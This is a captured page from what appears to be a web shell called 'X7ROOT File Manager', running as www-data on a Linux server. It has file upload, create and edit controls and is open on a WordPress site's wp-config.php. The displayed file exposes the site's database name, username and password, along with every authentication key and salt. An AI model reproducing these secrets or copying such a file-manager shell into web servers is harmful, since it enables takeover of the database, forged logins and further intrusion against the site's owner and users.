X7ROOT File Manager
PHP:
8.1.2-1ubuntu2.21
OS:
Linux
User:
www-data
Root
/
var
/
www
/
html
📤 Upload
📝 New File
📁 New Folder
Close
Editing: wp-config.php
<?php define( 'WP_CACHE', true /* Modified by NitroPack */ ); // Added by WP Rocket define( 'WP_CACHE', false /* Modified by NitroPack */ ); // Added by WP Rocket define( 'WP_CACHE', true /* Modified by NitroPack */ ); // Added by WP Rocket // Added by WP Rocket // Added by WP Rocket // Added by WP Rocket // Added by WP Rocket /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'idealwpDb1' ); /** MySQL database username */ define( 'DB_USER', 'ifdbUser1' ); /** MySQL database password */ define( 'DB_PASSWORD', 'ifdbDBpa12' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'lLp=6r[a.1qsV~i:v#>/Q-,=(Rirf8385B*rr/30A-D7[}H~Mgz+8-PGb1&^Aeic' ); define( 'SECURE_AUTH_KEY', '$X:m?:fribcxwrS56]On_4es++%D]6>PdaNiSm:}E+s[=PnMB9ru5)@?>u5qIM%s' ); define( 'LOGGED_IN_KEY', 's3*CaeqU%3P~Jb>`g^@~=n;8qYK5PF$Na9|(V06ggdvYJickQn!]}I}AUq1#:yZ`' ); define( 'NONCE_KEY', 'G^OzjRc!D+EBXr3Fai,x6_7^e/#9+OBRCI A.SU$C:MST9)^s_ TEfPW;Xz8rDh=' ); define( 'AUTH_SALT', '}<YCHtoaoZg?//s+l#$pIu$ZmFZ>:Jo|pUgto<]:3G-.S!wt8k0IS&w;/y_E]>E/' ); define( 'SECURE_AUTH_SALT', 'q.Qc }|@&;DoCB#;-)O`TqEl@U1$91_mQF[wUirEzU{@*;3oyf<AfdR{|%8f/q&]' ); define( 'LOGGED_IN_SALT', 'R?zUuq3Ew%qm=+NU#%^M#uf*G4(hQIPog$fDWtb+`s;a}HM,1a-`a_}IvC}BXjPg' ); define( 'NONCE_SALT', 'V&PR(hOuIb<bmF[{eMb@y>d{f]DaBy;%X&!-MQSUlE<DnnOJjAK6Ed;I~,alU%g8' ); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'if_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define('WP_DEBUG', true); define('WP_DEBUG_LOG', true); define('WP_DEBUG_DISPLAY', false); define('WP_MEMORY_LIMIT', '256M'); define('WP_MAX_MEMORY_LIMIT', '512M'); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Save
Cancel